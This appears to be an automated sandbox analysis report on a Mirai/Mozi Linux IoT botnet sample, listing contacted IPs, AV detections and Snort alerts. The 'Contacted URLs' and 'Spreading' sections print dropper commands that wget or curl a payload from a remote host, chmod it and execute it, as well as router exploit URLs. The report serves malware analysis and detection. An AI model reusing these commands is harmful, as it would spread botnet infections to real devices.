Source: functions.sh0.8.dr	Binary or memory string: identify_qemu_vcpus () {
Source: functions.sh0.8.dr	Binary or memory string: # qemu-args already contains "-smp".
Source: kvm-test-1-run.sh.8.dr	Binary or memory string: if kill -0 $qemu_pid > /dev/null 2>&1
Source: functions.sh0.8.dr	Binary or memory string: # Use TORTURE_QEMU_CMD environment variable or appropriate
Source: functions.sh0.8.dr	Binary or memory string: echo Cannot figure out what qemu command to use! 1>&2
Source: functions.sh0.8.dr	Binary or memory string: # the kernel at hand. Override with the TORTURE_QEMU_CMD environment variable.
Source: functions.sh0.8.dr	Binary or memory string: # identify_qemu_vcpus
Source: kvm.sh.8.dr	Binary or memory string: TORTURE_QEMU_CMD="$2"
Source: functions.sh0.8.dr	Binary or memory string: # specify_qemu_cpus qemu-cmd qemu-args #cpus
Source: functions.sh0.8.dr	Binary or memory string: # identify_qemu_args qemu-cmd serial-file
Source: functions.sh0.8.dr	Binary or memory string: if test -n "$TORTURE_QEMU_CMD"
Source: kvm.sh.8.dr	Binary or memory string: --qemu-cmd)
Source: kvm.sh.8.dr	Binary or memory string: TORTURE_QEMU_MAC="$TORTURE_QEMU_MAC"; export TORTURE_QEMU_MAC
Source: kvm-test-1-run.sh.8.dr	Binary or memory string: qemu_args=$5
Source: kvm-test-1-run.sh.8.dr	Binary or memory string: echo $QEMU $qemu_args -m 512 -kernel $resdir/bzImage -append \"$qemu_append $boot_args\" > $resdir/qemu-cmd
Source: kvm-test-1-run.sh.8.dr	Binary or memory string: qemu_args="$qemu_args `identify_qemu_args "$QEMU" "$builddir/console.log"`"
Source: kvm-test-1-run.sh.8.dr	Binary or memory string: # Generate qemu -append arguments
Source: functions.sh0.8.dr	Binary or memory string: # identify_qemu builddir
Source: functions.sh0.8.dr	Binary or memory string: # and the TORTURE_QEMU_INTERACTIVE environment variable.
Source: kvm-test-1-run.sh.8.dr	Binary or memory string: # Generate architecture-specific and interaction-specific qemu arguments
Source: functions.sh0.8.dr	Binary or memory string: echo -device spapr-vlan,netdev=net0,mac=$TORTURE_QEMU_MAC
Source: kvm.sh.8.dr	Binary or memory string: checkarg --qemu-cmd "(qemu-system-...)" $# "$2" 'qemu-system-' '^--'
Source: functions.sh0.8.dr	Binary or memory string: echo qemu-system-i386
Source: functions.sh0.8.dr	Binary or memory string: # Output arguments for qemu arguments based on the TORTURE_QEMU_MAC
Source: functions.sh0.8.dr	Binary or memory string: echo qemu-system-x86_64
Source: functions.sh0.8.dr	Binary or memory string: identify_qemu () {

Screenshots

No Screenshots

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
164.31.27.58	unknown	Germany	29355	KCELL-ASKZ	false
19.35.22.33	unknown	United States	3	MIT-GATEWAYSUS	true
164.176.196.33	unknown	United States	37717	EL-KhawarizmiTN	false
92.10.113.236	unknown	United Kingdom	13285	OPALTELECOM-ASTalkTalkCommunicationsLimitedGB	false
43.216.7.248	unknown	Japan	4249	LILLY-ASUS	false
62.146.28.116	unknown	Germany	15598	QSC-AG-IPXDE	false
134.136.214.66	unknown	United States	132	WPAFB-CSD-NET-ASUS	false
59.186.255.47	unknown	Korea Republic of	9638	NH-ASNationalAgriculturalCooperativefederationKR	false
58.33.168.139	unknown	China	4812	CHINANET-SH-APChinaTelecomGroupCN	false
218.245.32.128	unknown	China	4847	CNIX-APChinaNetworksInter-ExchangeCN	false
74.73.218.101	unknown	United States	12271	TWC-12271-NYCUS	false
63.112.131.88	unknown	United States	701	UUNETUS	false
220.49.0.51	unknown	Japan	17676	GIGAINFRASoftbankBBCorpJP	false
86.130.232.94	unknown	United Kingdom	2856	BT-UK-ASBTnetUKRegionalnetworkGB	false
75.189.26.238	unknown	United States	11426	TWC-11426-CAROLINASUS	false
155.117.48.151	unknown	United States	11003	PANDGUS	false
191.213.118.143	unknown	Brazil	7738	TelemarNorteLesteSABR	false
190.61.180.10	unknown	Colombia	18747	IFX18747US	false
122.107.18.193	unknown	Australia	4804	MPX-ASMicroplexPTYLTDAU	false
29.68.34.28	unknown	United States	7922	COMCAST-7922US	false
185.226.106.196	unknown	Spain	207046	REDSERVICIOES	false
175.165.55.236	unknown	China	4837	CHINA169-BACKBONECHINAUNICOMChina169BackboneCN	false
32.119.200.236	unknown	United States	7018	ATT-INTERNET4US	false
72.87.194.121	unknown	United States	5650	FRONTIER-FRTRUS	false
213.121.103.4	unknown	United Kingdom	2856	BT-UK-ASBTnetUKRegionalnetworkGB	false
166.120.240.93	unknown	Australia	18106	VIEWQWEST-SG-APViewqwestPteLtdSG	false
162.48.192.209	unknown	United States	35893	ACPCA	false
86.249.71.23	unknown	France	3215	FranceTelecom-OrangeFR	false
98.37.89.152	unknown	United States	7922	COMCAST-7922US	false
148.200.165.122	unknown	Netherlands	33915	TNF-ASNL	false
72.208.107.184	unknown	United States	22773	ASN-CXA-ALL-CCI-22773-RDCUS	false
100.54.104.98	unknown	United States	701	UUNETUS	false
113.178.195.53	unknown	Viet Nam	45899	VNPT-AS-VNVNPTCorpVN	false
113.202.99.35	unknown	China	4837	CHINA169-BACKBONECHINAUNICOMChina169BackboneCN	false
99.198.164.146	unknown	United States	16591	GOOGLE-FIBERUS	false
113.138.14.215	unknown	China	4134	CHINANET-BACKBONENo31Jin-rongStreetCN	false
73.109.81.199	unknown	United States	7922	COMCAST-7922US	false
35.155.184.95	unknown	United States	16509	AMAZON-02US	false
50.83.208.186	unknown	United States	30036	MEDIACOM-ENTERPRISE-BUSINESSUS	false
39.167.82.179	unknown	China	9808	CMNET-GDGuangdongMobileCommunicationCoLtdCN	false
75.36.210.166	unknown	United States	7018	ATT-INTERNET4US	false
59.249.34.45	unknown	China	2516	KDDIKDDICORPORATIONJP	false
93.203.255.9	unknown	Germany	3320	DTAGInternetserviceprovideroperationsDE	true
111.253.169.172	unknown	Taiwan; Republic of China (ROC)	3462	HINETDataCommunicationBusinessGroupTW	false
125.15.133.201	unknown	Japan	9824	JTCL-JP-ASJupiterTelecommunicationCoLtdJP	false
172.222.196.31	unknown	United States	20115	CHARTER-20115US	false
72.68.142.193	unknown	United States	701	UUNETUS	false
103.58.197.248	unknown	unknown	134218	GAMING-AS-APGamingInvestmentsPtyLtdAU	false
11.3.231.145	unknown	United States	3356	LEVEL3US	false
32.227.55.20	unknown	United States	2686	ATGS-MMD-ASUS	false
168.26.94.133	unknown	United States	3479	PEACHNET-AS1US	false
181.148.98.93	unknown	Colombia	26611	COMCELSACO	false
186.64.54.15	unknown	Argentina	701	UUNETUS	false
101.244.33.33	unknown	China	17429	BGCTVNETBEIJINGGEHUACATVNETWORKCOLTDCN	false
195.254.187.23	unknown	unknown	50434	DEVONSTUDIODEVONSTUDIOAutonomousSystemPL	false
149.52.60.248	unknown	United States	174	COGENT-174US	false
97.23.253.187	unknown	United States	22394	CELLCOUS	false
24.144.48.190	unknown	United States	12231	CONWAYCORPUS	false
36.47.114.54	unknown	China	4134	CHINANET-BACKBONENo31Jin-rongStreetCN	false
67.168.47.89	unknown	United States	7922	COMCAST-7922US	false
140.43.31.90	unknown	United States	668	DNIC-AS-00668US	false
69.150.69.116	unknown	United States	7018	ATT-INTERNET4US	false
201.181.160.44	unknown	Argentina	22927	TelefonicadeArgentinaAR	false
8.171.95.12	unknown	Singapore	37963	CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd	false
198.198.32.42	unknown	United States	292	ESNET-WESTUS	false
46.42.169.51	unknown	Russian Federation	29125	TATINT-ASRU	false
154.138.26.112	unknown	Egypt	37069	MOBINILEG	false
72.24.210.73	unknown	United States	11492	CABLEONEUS	false
12.96.110.207	unknown	United States	32617	STEAK-N-SHAKEUS	false
40.96.198.202	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
55.204.254.198	unknown	United States	1541	DNIC-ASBLK-01534-01546US	false
83.68.127.228	unknown	France	34809	SANEF-ASFR	false
110.86.197.212	unknown	China	4134	CHINANET-BACKBONENo31Jin-rongStreetCN	false
173.80.87.48	unknown	United States	19108	SUDDENLINK-COMMUNICATIONSUS	false
24.159.133.235	unknown	United States	20115	CHARTER-20115US	false
215.107.106.224	unknown	United States	721	DNIC-ASBLK-00721-00726US	false
17.103.12.181	unknown	United States	714	APPLE-ENGINEERINGUS	false
207.144.55.208	unknown	United States	18671	PRTC-SCUS	false
88.103.196.15	unknown	Czech Republic	5610	O2-CZECH-REPUBLICCZ	false
197.223.37.86	unknown	Egypt	37069	MOBINILEG	false
196.224.36.136	unknown	Tunisia	37492	ORANGE-TN	false
85.110.95.80	unknown	Turkey	9121	TTNETTR	false
16.158.169.248	unknown	United States	unknown	unknown	false
195.76.91.176	unknown	Spain	3352	TELEFONICA_DE_ESPANAES	false
58.20.74.167	unknown	China	4837	CHINA169-BACKBONECHINAUNICOMChina169BackboneCN	false
173.134.223.176	unknown	United States	10507	SPCSUS	false
39.189.171.124	unknown	China	56041	CMNET-ZHEJIANG-APChinaMobilecommunicationscorporationC	false
175.3.12.174	unknown	China	4134	CHINANET-BACKBONENo31Jin-rongStreetCN	false
166.183.247.157	unknown	United States	20057	ATT-MOBILITY-LLC-AS20057US	false
5.41.198.250	unknown	Saudi Arabia	39891	ALJAWWALSTC-ASSA	false
106.128.236.208	unknown	Japan	2516	KDDIKDDICORPORATIONJP	false
135.48.205.7	unknown	United States	54614	CIKTELECOM-CABLECA	false
27.219.87.4	unknown	China	4837	CHINA169-BACKBONECHINAUNICOMChina169BackboneCN	false
93.45.184.9	unknown	Italy	12874	FASTWEBIT	false
91.102.92.141	unknown	Denmark	12617	SOLIDO-NETSentiaDanmarkASDK	false
66.148.28.100	unknown	Canada	395177	VFNLLCUS	false
218.34.211.21	unknown	Taiwan; Republic of China (ROC)	7482	APOL-ASAsiaPacificOn-lineServiceIncTW	false
157.98.25.110	unknown	United States	3527	NIH-NETUS	false
168.44.159.27	unknown	United States	1761	TDIR-CAPNETUS	false
141.57.194.108	unknown	Germany	680	DFNVereinzurFoerderungeinesDeutschenForschungsnetzese	false

Contacted Domains

Name	IP	Active
dht.transmissionbt.com	87.98.162.88	true
bttracker.acc.umu.se	130.239.18.159	true
router.bittorrent.com	67.215.246.10	true
router.utorrent.com	82.221.103.244	true
bttracker.debian.org	unknown	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://13.109.201.46:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws	true	Avira URL Cloud: safe	unknown
http://112.125.239.197:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws	true	Avira URL Cloud: safe	unknown
http://3.22.17.236:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws	true	Avira URL Cloud: safe	unknown
http://46.249.83.253:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws	true	Avira URL Cloud: safe	unknown
http://154.3.84.96:80/HNAP1/	true	Avira URL Cloud: safe	unknown
http://210.190.146.92:80/HNAP1/	true	Avira URL Cloud: safe	unknown
http://114.204.63.176:49152/soap.cgi?service=WANIPConn1	false	Avira URL Cloud: safe	unknown
http://123.110.194.55:80/HNAP1/	true	Avira URL Cloud: safe	unknown
http://185.36.171.129:80/HNAP1/	true	Avira URL Cloud: safe	unknown
http://89.129.183.215:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws	true	Avira URL Cloud: safe	unknown
http://49.44.132.19:80/HNAP1/	true	Avira URL Cloud: safe	unknown
http://127.0.0.1:80/GponForm/diag_Form?images/	true	Avira URL Cloud: safe	unknown
http://45.148.37.237:80/HNAP1/	true	Avira URL Cloud: safe	unknown
http://184.86.117.97:80/HNAP1/	true	Avira URL Cloud: safe	unknown
http://166.88.13.234:80/HNAP1/	true	Avira URL Cloud: safe	unknown
http://127.0.0.1:8080/GponForm/diag_Form?images/	true	Avira URL Cloud: safe	unknown
http://104.124.230.135:80/HNAP1/	true	Avira URL Cloud: safe	unknown
http://81.196.113.75:80/HNAP1/	true	Avira URL Cloud: safe	unknown
http://204.232.228.51:80/HNAP1/	true	Avira URL Cloud: safe	unknown
http://1.34.1.251:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws	true	Avira URL Cloud: safe	unknown
http://188.106.17.156:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws	true	Avira URL Cloud: safe	unknown
http://147.46.176.166:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws	true	Avira URL Cloud: safe	unknown
http://179.40.62.87:80/HNAP1/	true	Avira URL Cloud: safe	unknown

AV Detection:

Antivirus / Scanner detection for submitted sample

Source: nT7K5GG5km

Avira: detected

Antivirus detection for dropped file

Source: /usr/networks

Avira: detection malicious, Label: LINUX/Mirai.lldau

Multi AV Scanner detection for submitted file

Source: nT7K5GG5km	Virustotal: Detection: 65%	Perma Link
Source: nT7K5GG5km	Metadefender: Detection: 51%	Perma Link
Source: nT7K5GG5km	ReversingLabs: Detection: 68%

Spreading:

Found strings indicative of a multi-platform dropper

Source: nT7K5GG5km	String: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i \|\|curl -O http://%s:%d/i \|\|/bin/busybox wget http://%s:%d/i;chmod 777 i \|\|(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
Source: nT7K5GG5km	String: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/bin.sh \|\|curl -O http://%s:%d/bin.sh \|\|/bin/busybox wget http://%s:%d/bin.sh;chmod 777 bin.sh \|\|(cp /bin/ls bix.sh;cat bin.sh>bix.sh;rm bin.sh;cp bix.sh bin.sh;rm bix.sh);sh bin.sh %s;/bin/busybox echo -e '%s'
Source: nT7K5GG5km	String: nvalidailedncorrecteniedoodbyebad$ELFshelldvrdvswelcomesuccessmdm96259615-cdpF6connectedBCM#usernamepass>/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i \|\|curl -O http://%s:%d/i \|\|/bin/busybox wget http://%s:%d/i;chmod 777 i \|\|(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'

Opens /proc/net/* files useful for finding connected devices and routers

Source: /tmp/nT7K5GG5km (PID: 4623)	Opens: /proc/net/route			Jump to behavior
Source: /tmp/nT7K5GG5km (PID: 4623)	Opens: /proc/net/route			Jump to behavior

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Source: Traffic	Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:58004 -> 185.146.156.163:80
Source: Traffic	Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:58004 -> 185.146.156.163:80
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 217.83.225.155: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 24.115.244.92: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 218.248.113.97: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 217.93.0.20: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 89.233.76.116: -> 192.168.2.20:
Source: Traffic	Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:55646 -> 94.91.134.122:80
Source: Traffic	Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:55646 -> 94.91.134.122:80
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 93.197.142.165: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 46.92.49.206: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 84.188.107.95: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 93.200.50.12: -> 192.168.2.20:
Source: Traffic	Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 212.219.171.130: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 82.71.24.101: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 212.73.64.16: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 95.115.11.153: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 74.199.108.177: -> 192.168.2.20:
Source: Traffic	Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 112.30.4.77:29583 -> 192.168.2.20:8080
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 79.250.123.141: -> 192.168.2.20:
Source: Traffic	Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 223.130.28.80:12685 -> 192.168.2.20:8080
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 79.207.84.233: -> 192.168.2.20:
Source: Traffic	Snort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 185.165.138.163: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 84.175.33.108: -> 192.168.2.20:
Source: Traffic	Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 160.9.43.253: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 88.65.145.128: -> 192.168.2.20:
Source: Traffic	Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 117.254.146.23:1027 -> 192.168.2.20:8080
Source: Traffic	Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 59.99.143.214:12658 -> 192.168.2.20:8080
Source: Traffic	Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 117.194.166.181:34323 -> 192.168.2.20:8080
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 82.83.51.81: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 77.10.2.50: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 73.39.241.178: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 218.248.173.141: -> 192.168.2.20:
Source: Traffic	Snort IDS: 716 INFO TELNET access 182.180.165.26:23 -> 192.168.2.20:39516
Source: Traffic	Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:57484 -> 104.111.81.230:80
Source: Traffic	Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:57484 -> 104.111.81.230:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.111.81.230:80 -> 192.168.2.20:57484
Source: Traffic	Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 188.1.231.30: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 155.4.82.118: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 91.2.62.69: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 212.7.29.198: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 50.242.148.249: -> 192.168.2.20:
Source: Traffic	Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:50636 -> 81.196.113.75:80
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 86.65.65.146: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 87.159.66.221: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 89.186.146.41: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 88.78.107.232: -> 192.168.2.20:
Source: Traffic	Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 172.16.16.2: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 93.203.255.9: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 72.35.40.202: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 80.157.131.61: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 80.157.128.213: -> 192.168.2.20:
Source: Traffic	Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 130.236.0.8: -> 192.168.2.20:
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 184.86.117.97:80 -> 192.168.2.20:36288
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 46.94.183.248: -> 192.168.2.20:
Source: Traffic	Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 93.187.161.54: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 65.144.251.70: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 77.180.41.173: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 95.223.233.145: -> 192.168.2.20:
Source: Traffic	Snort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 118.151.143.192: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 91.184.161.124: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 192.168.51.205: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 91.48.247.129: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 92.213.18.103: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 67.131.254.22: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 82.161.200.6: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 217.227.175.107: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 92.196.216.151: -> 192.168.2.20:
Source: Traffic	Snort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 166.88.241.155: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 91.62.3.74: -> 192.168.2.20:
Source: Traffic	Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 213.91.166.30: -> 192.168.2.20:
Source: Traffic	Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 208.71.234.42: -> 192.168.2.20:
Source: Traffic	Snort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 23.230.19.100: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 87.146.228.186: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 79.199.155.152: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 217.85.44.74: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 79.242.180.69: -> 192.168.2.20:
Source: Traffic	Snort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 185.233.149.60: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 82.95.159.167: -> 192.168.2.20:
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:40460 -> 112.125.239.197:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:40460 -> 112.125.239.197:80
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 207.174.245.173: -> 192.168.2.20:
Source: Traffic	Snort IDS: 716 INFO TELNET access 182.180.165.26:23 -> 192.168.2.20:40704
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 12.125.79.34: -> 192.168.2.20:
Source: Traffic	Snort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 156.243.30.45: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 188.98.47.216: -> 192.168.2.20:
Source: Traffic	Snort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 104.252.81.170: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 164.82.21.30: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 88.97.57.196: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 37.46.148.51: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 79.21.227.159: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 66.44.57.192: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 46.86.81.6: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 85.197.4.212: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 95.118.110.204: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 218.248.126.117: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 84.96.210.74: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 218.248.106.133: -> 192.168.2.20:
Source: Traffic	Snort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 175.45.105.154: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 46.244.211.255: -> 192.168.2.20:
Source: Traffic	Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 93.51.232.252: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 87.179.241.64: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 92.214.192.245: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 85.129.90.38: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 188.193.95.45: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 91.33.116.90: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 213.152.110.224: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 64.189.20.4: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 119.225.210.242: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 178.1.99.120: -> 192.168.2.20:
